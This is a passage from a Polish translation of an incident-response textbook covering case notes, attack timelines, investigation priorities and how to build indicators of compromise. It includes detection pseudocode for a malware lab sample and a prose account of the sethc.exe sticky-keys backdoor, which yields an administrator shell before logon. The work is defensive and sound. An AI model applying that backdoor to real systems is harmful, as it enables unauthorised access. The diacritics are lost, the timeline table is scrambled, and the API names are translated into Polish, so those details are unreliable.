Przez cay czas trwania procesu reakcji na incydent naley sporzdza notatki. Od chwili wykrycia
incydentu lub otrzymania powiadomienia o nim do momentu sporzdzenia ostatecznego raportu
zapisywanie notatek ma krytyczne znaczenie. Kiedy duo si dzieje i ma miejsce wiele incydentw
jednoczenie, notatki pomagaj nie zwariowa. Peni one trzy podstawowe role: pozwalaj zachowa
koncentracj na sprawie, uatwiaj innym czonkom zespou przejmowanie czynnoci po nas oraz
umoliwiaj innym zewntrznym podmiotom odtworzenie naszego procesu.
Zazwyczaj notatki przechowujemy w nieformalnym dokumencie o lunej strukturze. Powinno

da si atwo i szybko zapisa, co si wanie zrobio, jakie jest nasze zdanie, co si odkryo, co inni
zrobili oraz co planuje si dalej robi. Informacje takie najczciej przechowuje si w kolejnoci
chronologicznej. Nie twierdzimy, e musisz dokumentowa kady swj ruch, tylko waniejsze
zadania i wyniki ich wykonania. Notatki powinno si prowadzi profesjonalnie, poniewa mog
by wykorzystywane take przez podmioty zewntrzne. W kocu nie naley myli sporzdzania
notatek do sprawy z dokumentowaniem aktywnoci hakera notatki dokumentuj to, co Ty robisz,
a nie haker.
Chronologiczne zapisywanie informacji o ataku

W kadym ledztwie, jakie prowadzimy, tworzymy chronologiczny rejestr zdarze. Uatwia nam to
uporzdkowanie swoich dziaa, utrzymanie kontekstu, wykrycie niespjnoci oraz stworzenie
oglnego obrazu tego, co si stao. Miej wiadomo, e zdarzenia nie musz by wprowadzane
w kolejnoci chronologicznej. Chodzi nam tylko o to, e informacje o nich powinno si zapisywa
wtedy, gdy si je zdobdzie, a nie wtedy, gdy zdarzenia miay miejsce. Ponisza tabela przedstawia
przykadowy chronologiczny rejestr czynnoci posortowany wg godzin.
Data Godzina rdo

Host Opis zdarzenia
dodania zdarzenia (UTC) danych
2013-05-08 2012-11-14 host6492581 Zainfekowany zacznik do System plikw,
18:16:24 wiadomoci e-mail otwarty lista ostatnio
przez uytkownika o nazwie uywanych
profilu bob smith plikw
2013-05-08 2012-11-14 host6492581 Utworzenie pliku Metadane
18:20:44 C:\WINDOWS\Prefetch\ systemu plikw
IPCONFIG.EXE-5874FA11.pf
2013-05-08 2012-11-14 host6492581 Utworzenie pliku Metadane
18:21:16 C:\WINDOWS\Prefetch\ systemu plikw
GSECDUMP.EXE-54F3F8EA.pf
2013-05-07 2012-11-15 nd Uytkownik Bob Smith Biletowy
07:13:00 zadzwoni do dziau system
bezpieczestwa IT w celu bezpieczestwa
zgoszenia podejrzanej
wiadomoci e-mail otwartej
poprzedniego dnia
2013-05-08 2013-05-08 nd Zebranie danych z dziaajcego Biletowy
05:15:00 komputera uytkownika system
Bob Smith, host6492581 bezpieczestwa
Porwnujc nowe informacje z zapisanymi w harmonogramie, mona ocenia przydatno

nowych tropw. Jeli np. znajdziesz lady sugerujce, e pierwszy atak nastpi p roku przed
najstarsz dat, jak masz w swoich notatkach, osigne przeom w sprawie albo patrzysz na
niemajce z ni zwizku informacje. Innym przykadem mog by sekwencje zdarze. Wyobra
sobie, e odkrywasz, i haker utworzy plik, ktry nastpnie wysa na zewntrz sieci. Po wprowadzeniu
tej informacji do harmonogramu odkry dowiadujesz si, e znacznik czasu transferu zarejestrowany
przez serwer proxy wskazuje dat wczeniejsz ni data utworzenia tego pliku. Jako e plik musi
istnie, aby mona byo go przesa, co jest nie tak z Twoimi danymi lub sposobem, w jaki je
interpretujesz.
Harmonogram zdarze ataku skupia si na wanych poczynaniach hakera. Naley w nim
zapisywa takie szczegy jak wejcie intruza do systemu, czas utworzenia plikw, czas przesania
danych oraz kiedy byy uruchamiane rne narzdzia. Ponadto naley zapisywa rda danych.
Jeli np. zapiszesz, e haker wszed do systemu, dodaj informacj o tym, skd si o tym dowiedziae.
I w kocu nie zapomnij zapisa identyfikatora systemu, w ktrym wystpio zdarzenie.
PRIORYTETY LEDZTWA
Aby przeprowadzi skuteczne ledztwo, naley dobrze przemyle cele i planowane wyniki.
Kady rodzaj sprawy ma pewne cechy charakterystyczne celem moe by doprowadzenie
sprawcy do sdu lub tylko wzmocnienie zabezpiecze. Zesp powinien mie jasno okrelone,
czego szuka lub co trzeba udowodni i w jaki sposb przedstawi wyniki.
Co to s elementy dowodu
W sensie prawnym elementy dowodu to fakty potwierdzajce zasadno oskarenia. Jeli np.
miaby prowadzi dochodzenie w sprawie kradziey, Twoim gwnym elementem dowodu byoby
dowiedzenie, e dana rzecz, bdca wasnoci innej osoby, zostaa jej zabrana. Jednak ledztw
prowadzonych przez korporacyjne zespoy reagowania na incydenty nie da si atwo zaklasyfikowa
do dziedziny kradziey lub naruszenia praw autorskich. Podczas dochodze w sprawach wtargnicia
do systemu posugujemy si szersz definicj elementw dowodu, w ktrej pocztkowo jest tylko
kilka szerokich tez, jakie nastpnie si zawaj i uszczegowiaj w trakcie trwania procesu. Przede
wszystkim naley pamita, kto jest gwnym odbiorc raportu. Przykadowo cele ledztwa w sprawie
wamania do systemu s oczywiste. Naley dowiedzie si, kto dokona wamania, kiedy do tego
doszo, co zostao skradzione oraz czy intruz wci szpera w sieci. Z drugiej strony, jeli ledztwo
dotyczy brany kart patniczych (PCI) i istnieje podejrzenie wycieku danych kont, jednym z celw
jest wygenerowanie listy potencjalnie naraonych na niebezpieczestwo numerw kont oraz dat,
kiedy doszo do kradziey. Cele innych rodzajw ledztw mog nie by takie oczywiste i ich
okrelenie moe wymaga konsultacji z radc prawnym, jeli jeszcze nie prowadzi on dochodzenia.
Wemy np. ledztwo w sprawie naruszenia praw autorskich. Zasadniczo w takich sprawach
korzysta si z pomocy wasnych adwokatw lub zewntrznych radcw prawnych, aby okreli cele
dochodzenia. Skrupulatny analityk powinien postara si jak najlepiej zrozumie, czego mona
oczekiwa od zespou prawnikw, i zastanowi si, jakie s dostpne rda danych, ktre pozwol
zaspokoi ich wymagania. wiadomo, e sprawy dotyczce naruszenia praw wasnoci skadaj
si z dwch elementw udowodnienia posiadania praw autorskich i wykazania, e skopiowanie
materiau daje podstaw do wszczcia postpowania pomoe analitykowi w wykonywaniu swoich
czynnoci oraz uatwi mu informowanie prawnikw o dodatkowych metodach lub rdach.
Podczas ledztwa, podobnie jak w przypadku spraw dotyczcych wasnoci intelektualnej,
wikszoci dziaa kieruj prawnicy. Bior na siebie odpowiedzialno za udowodnienie
zasadnoci lub bezzasadnoci roszczenia, ale mog potrzebowa od Twojego zespou identyfikacji,
zachowania i analizy danych. W niektrych ledztwach praca Twojego zespou, Twoje procesy
i sposoby sporzdzania dokumentacji mog podlega cisemu nadzorowi.
Ustalanie oczekiwa z kierownictwem

Gdy organizacja rozwaa moliwo wszczcia dochodzenia, zastanw si nad czynnikami decydujcymi
o realistycznoci celw. Dziki temu ustalisz odpowiednie oczekiwania z kierownictwem, co z kolei
pozwoli wszystkim podejmowa waciwe decyzje. Program minimum to zastanowienie si, jakie
bd dostpne rda dowodw, z jakiego rodzaju incydentem mamy do czynienia, sformuowanie
pyta, na ktre naley znale odpowiedzi oraz wyznaczenie iloci czasu zespoowi. Przykadowo
do wama do sieci hakerzy czsto wykorzystuj dalekie punkty przeskokowe, co utrudnia lub
wrcz uniemoliwia podjcie czynnoci prawnych, dopki nie zostanie przekroczona granica
umoliwiajca wczenie prawa federalnego. Jeli do wamania doszo kilka miesicy lub lat temu,
ilo dowodw moe by w najlepszym przypadku znikoma. Czynniki te mog si zmienia
w czasie ledztwa, wic warto co jaki czas do nich wraca, aby zweryfikowa, czy oczekiwania
nadal s realistyczne.
Gdy ju okrelisz realistyczne oczekiwania, musisz je odpowiednio przedstawi kierownictwu.
Jest to okazja do porozmawiania, wyjanienia wszelkich wtpliwoci i trudnoci oraz podjcia
logicznych decyzji. Ponadto dziki temu poznacie swoje obawy i punkty widzenia, co w przyszoci
zaowocuje formuowaniem bardziej realistycznych oczekiwa.
I CO Z TEGO
Jedn z najwikszych trudnoci, jakie naley pokona przy rozpoczynaniu kadego ledztwa, jest
oddzielenie faktw od fikcji i ustalenie pocztkowych priorytetw. W rozdziale tym opisalimy
zasady skutecznej komunikacji, tworzenia dokumentacji oraz rozumowania. Stosujc si do naszych
rad, zapewnisz sprawny obieg informacji midzy ledczymi, kierownictwem, prawnikami i innymi
decydentami. Opisane w pocztkowej czci rozdziau listy kontrolne pomog Ci nie zapomnie
o wanych sprawach podczas gorczkowych pierwszych faz dochodzenia w sprawie potencjalnego
incydentu.
Kilka razy spotkalimy si z sytuacj, w ktrej cele ledztwa zostay okrelone nierealistycznie.
Przykadowo doszo do wamania na serwer aplikacji pewnej firmy i haker utworzy witryn
z nielegalnym oprogramowaniem. Wstpna analiza przeprowadzona przez firm sugerowaa,
e wamanie zostao przeprowadzone przez interfejs administracyjny serwera sieciowego.
Dane zapisane w dziennikach sieciowych wskazyway, e w mniej wicej tym samym czasie,
w ktrym doszo do wamania, na serwerze by uruchomiony skaner luk w zabezpieczeniach.
Kierownictwo zlecio wewntrznemu zespoowi RI ustalenie, kto zaoy serwis z nielegalnym
oprogramowaniem, aby mona byo podj przeciwko niemu kroki prawne. Gdy wysiki tego
zespou spezy na niczym, poproszono nas o pomoc. Przeprowadzilimy z przedstawicielami
organizacji szczegowe wywiady na temat incydentu i spytalimy, jakie s ich oczekiwania
dotyczce ledztwa. Wyjanilimy, e tego typu ataki zdarzaj si bardzo czsto i zazwyczaj
w duym stopniu s przeprowadzane przez automaty. Szansa na wykrycie winnego jest bardzo
maa. Nawet gdyby udao si zlokalizowa intruza, rodki prawne, jakie mona przeciw niemu
wytoczy, nie dayby firmie wielkich korzyci. Dlatego zalecilimy skoncentrowanie si na
znalezieniu luki w zabezpieczeniach i zlikwidowaniu jej, aby zapobiec podobnym incydentom
w przyszoci. Gdyby wewntrzny zesp RI skonsultowa si z dziaem prawnym i zastanowi
nad prawdopodobiestwem uzyskania satysfakcjonujcego rozwizania, kierownictwo najpewniej
zrozumiaoby, jakie s ograniczenia tego wewntrznego ledztwa.
PYTANIA
1. Wymie pi najwaniejszych list kontrolnych, na podstawie ktrych powinno si zbiera
pocztkowe informacje o incydencie. Wymie po dwa najwaniejsze punkty z kadej z nich
i wyjanij, dlaczego s wane.
2. Podczas incydentu odkrywasz, e haker przeprowadzi atak typu brute force na serwer
baz danych. Zapisujesz to zdarzenie w swoim systemie. Jakiej strefy czasowej uyjesz?
Wyjanij, dlaczego.
3. Jakie cztery informacje powinno si zapisywa dla kadego rekordu w chronologicznym
zapisie aktywnoci hakera? Wybierz plik, np. win.ini w systemie Microsoft Windows lub
/etc/hosts w systemie uniksowym, i wprowad do harmonogramu jak najwicej wpisw
dotyczcych tego pliku z okreleniem czasu wystpienia zdarze.
4. Dlaczego naley prowadzi notatki w sprawie? Jak czsto powinno si je aktualizowa?
5. Twoja farma serwerw jest wykorzystywana jako punkt przerzutowy przez hakerw, ktrzy
byli aktywni w innych firmach. Jakie powinny by priorytety ledztwa w Twojej organizacji?
Jak wykaesz, e zaje si incydentem w profesjonalny sposb?
ROZDZIA 5.
Zdobywanie tropw
W
rozdziale 2. wyjanilimy, e tropy (ang. leads) to wymagajce podjcia dziaa informacje
o skradzionych danych, wskanikach sieciowych, tosamoci potencjalnych podmiotw
lub problemach, ktre doprowadziy do zagroenia albo incydentu bezpieczestwa.
W tym rozdziale opisujemy sposoby posugiwania si tropami oraz metody generowania wskanikw
i przegldania rodowiska w poszukiwaniu miejsc wystpienia szkodliwej dziaalnoci. Tropy
wymagajce dziaania, zadania, s podstaw do zrobienia czegokolwiek w ledztwie. Mog by one
wskanikami, ktre mona wykorzysta do przeczesania caego przedsibiorstwa, sygnaturami
ruchu sieciowego, ale mog te suy jedynie jako zasb, gdy trzeba bdzie przesucha pracownika.
Uwaga Pamitaj, e trop lub wskanik to jedynie sposb opisu pewnego konkretnego elementu
zwizanego ze ledztwem. Moe to by wyszukiwanie czego, o czym wiadomo, e istnieje
(artefakt szkodliwego programu albo zawarto historii przegldarki uytkownika),
lub tego czego, o czym wiadomo, e jest podejrzane, gdy wystpuje w wikszych ilociach
(np. szereg zdarze dotyczcych uytkownika lub jdra systemu).
DEFINIOWANIE WARTOCIOWYCH TROPW

Co to jest wartociowy trop? W rozdziale 2. napisalimy, e dobry trop ma trzy cechy:
jest istotny w ledztwie,
pozwala na podjcie dziaa,
zawiera odpowiedni ilo szczegowych informacji.
Bardzo wane jest oddzielenie tropw dobrych od bezwartociowych zwaszcza wtedy, gdy
moliwoci dziaania i czas zespou s ograniczone. Proces generowania tropw powinien by cigy.
W wikszoci ledztw dotyczcych wama komputerowych zmniejszajca si ilo tropw nie oznacza,
e jest mao danych, tylko e stosowane metody wykrywania s nieskuteczne. W zalenoci od
stanu ledztwa, mona utworzy nieformalny proces majcy na celu kategoryzacj i priorytetyzacj
tropw. Najwiksze korzyci z wprowadzenia takiego procesu odnosi si w nowych zespoach RI.
Zanim przeznaczymy czas lub inne zasoby dla tropu, wykonujemy nastpujce czynnoci:
wyjanienie danych,
weryfikacj prawdziwoci tropu,
okrelenie kontekstu tropu.
Kiedy trop zostanie wygenerowany przez czowieka lub automatyczny system monitorowania,
staramy si zebra dodatkowe dane, ktre pozwol potwierdzi jego prawdziwo. Jeli np. urzdzenie
do wykrywania wama zgosi alarm z informacj, e nastpio poczenie ze znanym serwerem
dowodzcym botnetem, moemy wszcz proces majcy na celu zgromadzenie danych pozwalajcych
potwierdzi prawdziwo tego zdarzenia. W ramach tego procesu zidentyfikowalibymy wewntrzne
pochodzenie poczenia, jeli informacji tej nie byoby w powiadomieniu alarmowym z powodu
translacji adresw sieciowych, przejrzelibymy surowe pakiety wygenerowane przez alarm oraz
ROZDZIA 5. ZDOBYWANIE TROPW 119
przeszukalibymy rekordy innych pocze wykonywanych przez podejrzany host. Te czynnoci

wstpne ograniczaj si do dziaa zwizanych bezporednio z tropem. Po zbadaniu faktw
moemy przej do zorganizowanego dziaania.
Drug nasz czynnoci jest weryfikacja typu tropu. Czy jest kompletny? Czy jest to kruchy trop
oparty na wskanikach lub obecnoci okrelonych surowych danych? Proces ten moe si znacznie
rni w zalenoci od rda danych, a szczeglnie wtedy, gdy zgoszenia dokona czowiek. Aby
zweryfikowa wiarygodno tropu, naley przeanalizowa przesanki, na podstawie ktrych zosta
wygenerowany, oraz trzeba wiedzie, jak dziaa generator. Jeli dziaanie generatora to proste
monitorowanie ruchu sieciowego pod ktem obecnoci pakietw zawierajcych dane na pozycji x
i wiadomo, e czstotliwo pojawiania si faszywych alarmw jest niewielka, to sprawa jest prosta.
Jeeli natomiast zaangaowane s osoby i nie da si stwierdzi, czy dana osoba rzeczywicie widziaa
to, co myli, trop moe nie zasugiwa na natychmiastow reakcj ze strony Twojego zespou.
Na koniec sprawdzamy kontekst wystpienia tropu. Czy system lub czowiek dostarczaj
informacji, ktre zostay le zinterpretowane z powodu wystpienia innego, spodziewanego
problemu? Sytuacje takie maj miejsce najczciej przy udziale ludzi, ale le skonfigurowane
automaty rwnie mog dostarcza mylnych danych.
Nie zawsze wykonujemy wszystkie te trzy kroki, poniewa same tropy mona zweryfikowa
podczas ledztwa. Ponadto proces ten jest bardzo nieformalny. Naley go traktowa jak oglne
ramy postpowania, w przypadku gdy trzeba oceni przydatno tropw.
POSTPOWANIE Z TROPAMI
Twj zesp otrzyma spor ilo dobrych tropw arkusz kalkulacyjny z podejrzanymi adresami IP,
list skrtw MD5 szkodliwych plikw oraz troch danych wykrytych podczas komunikacji serwera
firmowego z serwerem dowodzcym botnetem na porcie TCP/443. Co teraz?
Naley zamieni te tropy w przydatne wskaniki, takie, ktre pozwol wykry trwajce
zdarzenia i przysze ataki. Ponadto powinno da si wykrywa podejrzane warunki, ktre nie s
bezporednio zwizane z aktualnie posiadanymi informacjami. W kocu wiadomo, e musi dzia
si co jeszcze, co umoliwia pojawianie si tych podejrzanych pocze. W podrozdziale tym
opisujemy iteracyjny proces obejmujcy cay czas trwania ledztwa.
Ponadto przedstawiamy bardziej tradycyjne tropy, tzn. takie, ktrych weryfikacja wymaga
przeprowadzenia rozmw z ludmi. Jest to temat, ktrego pewnie nie spodziewae si po ksice
o prowadzeniu dochodze w sprawie przestpstw komputerowych.
Uwaga Jako specjalista od incydentw bezpieczestwa masz do wyboru kilka narzdzi do dziaania w skali caego
przedsibiorstwa. Jak piszemy w rozdziale 7., zarwno produkty Guidance Software, jak i AccessData
maj wtyczki Live Response lub wersje umoliwiajce zdobywanie danych. Nasza firma, Mandiant,
rwnie oferuje produkt i platform RI dla przedsibiorstw oraz darmowe narzdzia do uytku
w mniejszych rodowiskach. Ponadto administratorzy systemw mog wykonywa niektre z opisywanych
czynnoci za pomoc programu Microsoft System Center Configuration Manager (wczeniej SMS).
Jednak bdziemy szczerzy. W Mandiant wolimy nasze wasne narzdzia od konkurencji z kilku istotnych
technicznie powodw. W opisie wskanikw wykorzystujemy standard OpenIOC, ale elementy
mona atwo dostosowa do innych rozwiza RI.
Zamienianie tropw we wskaniki

Wikszo tropw generowanych przez zespoy RI zawiera wykrywalne cechy charakterystyczne
szkodliwych dziaa. Mog one by reprezentowane przez dwa typy wskanikw. Pierwszy typ
to wskaniki oparte na waciwociach, ktre opisuj zbir znanych cech charakterystycznych
szkodliwego oprogramowania lub szkodliwych dziaa np. klucz rejestru, skrt MD5, muteks
o niepowtarzajcej si nigdzie indziej nazwie. Niektre tropy s mniej konkretne i wwczas
podejrzenia moe budzi kombinacja pewnych cech np. niespodziewane pliki wykonywalne
w katalogu /Windows/Help. Takie wskaniki nazywamy wskanikami anomalnymi lub
metodycznymi. Wszystkie mona zamieni we wskaniki nadajce si do uycia w procesie
pojedynczej lub obejmujcej cae przedsibiorstwo reakcji na ywo majcej na celu okrelenie
zakresu incydentu. Przypominamy, e wskanikw uywamy gwnie do okrelania wielkoci
obszaru objtego incydentem. Wystarczy wskanik wykry raz, aby pniej szuka go wszdzie.
Na podstawie tropw mona tworzy wskaniki hostowe i sieciowe oraz ich kombinacje.
Wyobra sobie, e dokadnie zbadae budow wykrytego trojana i na podstawie zdobytej w ten
sposb wiedzy moesz zleci specjalistom od sieci i serwerw przeprowadzenie poszukiwa
i monitorowanie potencjalnych przyszych zdarze.
Cykl generowania wskanika

Cykl tworzenia wskanika rozpoczyna si od zdobycia pewnej porcji informacji z dowolnego rda.
Oczywicie najbardziej przydatne s dane z wiarygodnych rde, takich jak ekspertyzy ledcze czy
wysokiej jakoci raporty z analiz szkodliwego oprogramowania. Czasami informacje pocztkowe
mog zawiera tylko prost charakterystyk podejrzewanego ataku. W kadym razie czonkowie
zespou odpowiedzialni za generowanie wskanikw powinni najpierw przeprowadzi proces,
a dopiero potem przeczesa przedsibiorstwo w poszukiwaniu wskanikw lub wstawi wskanik
do sieciowych monitorw bezpieczestwa, zwaszcza jeli wskanik pochodzi ze rda zewntrznego.
Tworzenie wskanikw to proces iteracyjny, ktrego celem jest wygenerowanie solidnych
i trwaych sygnatur do zdobywania wiarygodnych informacji. Pierwszym elementem tego cyklu jest
wygenerowanie wskanika. Po zgromadzeniu pocztkowych danych rozpoczyna si faza tworzenia
i edycja (wskanika), co pokazano na rysunku 5.1. Proces ten to co wicej ni tylko uruchomienie
edytora tekstu lub XML i skopiowanie do niego skrtw MD5. Dodatkowo naley dobrze zna
jzyk do definiowania wskanikw i wykorzystywane procesory. Czsto moliwoci mechanizmu
przetwarzajcego s dobrze udokumentowane. Uwaa naley przede wszystkim na ograniczenia
i niuanse. Przykadem potencjalnie problematycznego niuansu na platformie Snort jest czas
potrzebny preprocesorowi na przetworzenie strumienia danych wejciowych. Zmiana liczby
zmiennych (np. czstotliwoci przychodzenia pakietw i objtoci pofragmentowanych pakietw)
moe spowodowa, e dobrze dziaajcy sensor zacznie gubi pakiety i dane. Innym przykadem
jest mechanizm indeksowania wykorzystywany w kilku pakietach oprogramowania do analizy
ledczej. Czasami przy tworzeniu indeksu znaki specjalne s wykorzystywane do amania sw
lub s po prostu ignorowane, przez co analityk nie moe znale przydatnych informacji, jeli
w szukanych frazach wystpuj znaki typu $ lub @. Dowiadczony analityk powinien zna
ograniczenia programu i umie minimalizowa zwizane z nimi niedogodnoci.
RYSUNEK 5.1. Cykl tworzenia wskanika
Wskanik po wygenerowaniu naley zweryfikowa, aby mona byo przekaza go do obiegu

lub uytku. W naszym cyklu tworzenia wskanika etap weryfikacji dzielimy na dwie metody: dane
dotyczce wskanika i dane dotyczce rodowiska. Weryfikacja przy uyciu tych dwch metod daje
pewno, e wskanik bdzie zarwno dokadny, jak i dostosowany do uycia w okrelonym celu.
Weryfikacj wskanikw opisujemy bardziej szczegowo dalej w tym rozdziale.
Informacje zdobyte podczas weryfikacji wykorzystuje si do udoskonalenia wskanika. Cykl jest
powtarzany dotd, a wskanik osignie dane cechy i bdzie si nadawa do uytku przez ledczych.
W ten sposb zapewnia si, e wskanik bdzie dawa oczekiwane wyniki. Pniej mona przekaza
go do wdroenia albo rozprowadzenia, czyli rozpocz etap publikacji wskanika.
Teraz przyjrzymy si dokadniej przedstawionym na schemacie etapom edycji i weryfikacji.
W miar postpu ledztwa cykl ten powtarza si wiele razy dla kolejnych wskanikw.
Bez odpowiedniej struktury mona utworzy niedoskonae wskaniki, ktre bd generowa
mnstwo dodatkowej pracy. Podalimy przykad moliwego ograniczenia sygnatury Snort,
ale ten sam proces dotyczy wskanikw hostowych. Zajmiemy si obydwoma typami.
Edytowanie wskanikw hostowych

Wskaniki hostowe su do wykonywania binarnej klasyfikacji punktw kocowych. Punkt kocowy
w ledztwie moe by istotny lub nie. Tworzymy wskaniki, skadajc zbir obserwacji opisujcy
warunki, ktre zgodnie z posiadan przez nas wiedz budz podejrzenia. To, czy uda si dziki temu
bezporednio wykry zamanie zabezpiecze systemu, zaley od jakoci skadnikw tego zbioru.
Dobry wskanik hostowy skada si z pewnej liczby obserwacji specyficznych dla okrelonej
aktywnoci, ale na tyle oglnych, aby dao si je zastosowa take do pochodnych tej aktywnoci.
Osignicie takiego balansu moe by trudne, szczeglnie wtedy, gdy obserwacje s oparte
na sabych lub niekompletnych tropach. Najlepiej wyjani to na przykadzie.
Pierwszy scenariusz, jaki przeanalizujemy, to tworzenie wskanika zagroenia na bazie
waciwoci pliku lub artefaktw wytworzonych przez jego wykonanie. W ramach wiczenia
przeanalizujemy jeden z plikw binarnych z ksiki Practical Malware Analysis (No Starch Press
2012). Wybralimy plik Lab03-02.dll z rozdziau 3. Ze strony internetowej tej ksiki mona
pobra wszystkie pliki binarne w niej uywane.
W INTERNECIE
practicalmalwareanalysis.com/labs
Majc ten plik, przyjrzymy si bardzo prostemu wskanikowi, ktry bdzie pozwala go
zidentyfikowa lub opisa. Wskanik ten zawiera jeden wysoce skuteczny test skrtu MD5.
Na kilku nastpnych stronach przedstawiamy wskaniki napisane w pseudokodzie, a nie
prawdziwym jzyku do definiowania wskanikw zagroenia. Oto pierwszy przykad:
if
{
(skrt MD5 pliku == "84882c9d43e23d63b82004fae74ebb61")
}
then
podnie alarm
Ten wskanik zagroenia ma kilka bardzo dobrych atrybutw. Szuka jednej konkretnej
wasnoci skrtu MD5. Zapewnia to wysoki poziom pewnoci, e jeli zostanie znalezione
dopasowanie, tzn. e znalelimy to, czego szukamy. Czstotliwo wystpowania faszywych
alarmw dla skrtw MD5 jest bardzo maa chyba nigdy nam si nie zdarzyo otrzyma
faszywego alarmu w takim przypadku. Jednak wskanik ten jest te bardzo ograniczony. Jeli
zostanie zmieniony choby jeden bit w szukanym pliku, przestaniemy cokolwiek wykrywa,
poniewa zmieni si skrt MD5. Jako e haker bardzo atwo moe zmieni tre pliku i zachowa
jego funkcjonalno wystarczy np. zmieni wpisany adres IP wskanik ten bdzie przydatny
tylko przez krtki czas. Oczywicie nie twierdzimy, e wykorzystywanie skrtw MD5 to zy pomys,
mwimy jedynie, e opieranie si tylko na tej jednej metodzie to nie najlepsze rozwizanie.
Naley sprawdza take inne atrybuty.
Wykonywalne pliki systemu Windows (PE) zawieraj kilka struktur danych, ktre rwnie
mona sprawdza i wykorzysta we wskanikach zagroenia. Przykadowo nagwek PE zawiera
znacznik czasu kompilacji. S to data i godzina wstawiane przez kompilator podczas kompilowania
pliku. Czasami hakerzy kompiluj plik i pniej rcznie go zmieniaj. W niektrych przypadkach
znacznik czasu kompilacji powtarza si na tyle rzadko, e mona go wykorzysta. Najczciej
jednak znacznika czasu uywamy z czym jeszcze, np. rozmiarem pliku, aby zminimalizowa
ryzyko pojawiania si faszywych alarmw. Dodamy wic teraz do naszego poprzedniego
wskanika te dwa nowe warunki:
if
{
OR
(
(nagwek PE lub data/godzina == "2010/09/28 01:00:25 UTC")
AND
(rozmiar pliku == "24065")
) }
then
podnie alarm
Wskanik nadal szuka skrtu MD5, ale dodatkowo sprawdza znacznik czasu kompilacji
i rozmiar pliku. Jeeli haker zmieni kilka bitw w pliku, ta wersja wskanika ma wiksz szans
na wykrycie tego faktu. Jeli jednak haker doda lub usunie dane, rozmiar pliku przestanie pasowa
i nie bdziemy w stanie go znale. Zobaczmy wic, co jeszcze mona poprawi w naszym wskaniku.
Gdy przeanalizujesz nasz plik binarny, zauwaysz, e moe on wykonywa kilka dziaa
w systemie. Moe np. instalowa usug Windows i czy si ze stron internetow. Obie te
informacje s cenne, poniewa moemy szuka zwizanych z nimi artefaktw. Musisz tylko mie
wiadomo, e nie s to bezporednie atrybuty pliku. S to artefakty powstajce na hocie w wyniku
uruchamiania tego pliku. Innymi sowy, szukamy efektw wykonania pliku, a nie samego tego
pliku. Dodanie takich testw do wskanika zagroenia jest korzystne, poniewa w systemie moe
ju nie by szukanego pliku albo mogy si zmieni jego atrybuty, ktrych szuka nasz wskanik.
Jak piszemy dalej w tym rozdziale, wane jest te zrozumienie cyklu ataku, aby doda wszelkie
istotne artefakty do wskanika. W tym przykadzie bdziemy szuka tylko dwch dodatkowych
elementw konkretnej nazwy usugi tworzonej przez plik binarny i artefaktu bufora DNS
zwizanego z nazw hosta, z ktrym czy si szkodliwy program. Zmodyfikowany wskanik
zagroenia teraz wyglda tak:
if
{
OR
(nazwa hosta bufora DNS zawiera "practicalmalwareanalysis.com")
OR
(Opisowa nazwa usugi == "wiadomo sieci wewntrznej")
OR
(
(Nazwa pliku == "lab03-02.dll")
AND
(
(Data/godzina w nagwku PE == "2010/09/28 01:00:25 UTC")
OR
(rozmiar pliku == "24065")
) ) }
then
podnie alarm
Ten wskanik zagroenia zawiera warunki, ktre sprawiaj, e jest o wiele bardziej skuteczny
od pierwszego przedstawionego wskanika. Powinien dziaa nawet wtedy, kiedy zostan
wprowadzone pewne zmiany w pliku binarnym oraz znajdzie artefakty tworzone przez ten plik
na hocie. Oczywicie moemy go jeszcze ulepszy. Musielibymy tylko dokadnie przyjrze si
wszystkim cechom dystynktywnym interesujcego nas pliku binarnego i tworzonym przez niego
artefaktom. Poniewa ich lista moe by bardzo duga, zazwyczaj staramy si znale zoty rodek
midzy zbyt ma i zbyt du liczb warunkw. Wszystko zaley od konkretnego pliku i rodzaju
caego incydentu.
Innym sposobem na ulepszenie naszego wskanika zagroenia jest opisanie tego, co wykonuje
plik binarny. Zazwyczaj robi si to, analizujc tabel importu. W niektrych przypadkach tabela ta
jest nieprzydatna np. z powodu dziaania archiwizatora albo ze wzgldu na to, e autor zastosowa
rczne importowanie funkcji. W naszym przykadowym pliku binarnym znajdujemy wiele

instrukcji importu. adna z nich w pojedynk nie jest wystarczajco unikalna, poniewa wiele
programw wykorzystuje podobne funkcje. Unikalny jest natomiast zestaw funkcji uywanych
razem w jednym pliku. Musimy wic utworzy wskanik zagroenia sprawdzajcy wiele
nieunikalnych waciwoci. Poniszy wskanik testuje w miar niepowtarzaln kombinacj
importowanych funkcji:
if
{
(lista nazw funkcji importowanych do pliku PE) contains
"UtwrzUsugA"
AND
"UtwrzKluczRejestru"
AND
"WczytajPlik"
AND
"UtwrzWtek"
AND
"PoczenieInternetoweA"
AND
"UtwrzProcesA"
}
then
podnie alarm
Wskanik ten znajdzie plik binarny na podstawie listy importowanych przez niego funkcji.
Dopki lista ta nie zmieni si w duym stopniu, haker moe zmienia due porcje kodu w pliku
i jego opcje konfiguracyjne, a i tak plik ten bdzie wykrywany. To by przykad tworzenia
wskanika zagroenia opisujcego atrybuty wybranego pliku. Teraz przyjrzymy si innej sytuacji.
Czsto trzeba tworzy wskaniki zagroenia opisujce dziaania hakera, poniewa nie mamy
do dyspozycji adnego szkodliwego programu. Teraz zbudujemy wskanik sucy do wykrywania
typowych sekwencji czynnoci, jakie mgby wykona intruz w systemie. Wskaniki tego rodzaju
nazywaj si wskanikami metodycznymi i mog zawiera te wskaniki dotyczce waciwoci
z informacjami o artefaktach pozostawianych przez aktywnego hakera. Doskonaym przykadem
ataku, ktrego cechy mona modelowa za pomoc wskanika metodycznego, jest atak polegajcy
na podmianie pliku sethc.exe. W tym przypadku nie jest uywany aden szkodliwy program, poniewa
czynno sprowadza si do prostych zmian w rejestrze lub podmiany jednego pliku. Aplikacja sethc.exe
na platformie Windows to program dostarczajcy rnych narzdzi uatwiajcych korzystanie
z komputera osobom niepenosprawnym. Uruchamia si go przez szybkie piciokrotne nacinicie
klawisza Shift i mona go wczy przed zalogowaniem. Hakerzy wykorzystuj t funkcj do
uruchamiania sesji cmd.exe z uprawnieniami administratora.
Atak taki mona przeprowadzi przede wszystkim na dwa sposoby. Po pierwsze, piciokrotne
nacinicie klawisza Shift powoduje uruchomienie pliku c:\windows\system32\sethc.exe. Wystarczy
tylko go podmieni na wasny. Po drugie, mona doda cmd.exe do procedury debugowania pliku
sethc.exe w rejestrze, poniewa system Windows nie sprawdza, czy procedura ta istotnie wskazuje
debugger.
Za pomoc jakich wskanikw moemy sprawdzi, czy system jest zagroony przez plik sethc.exe?
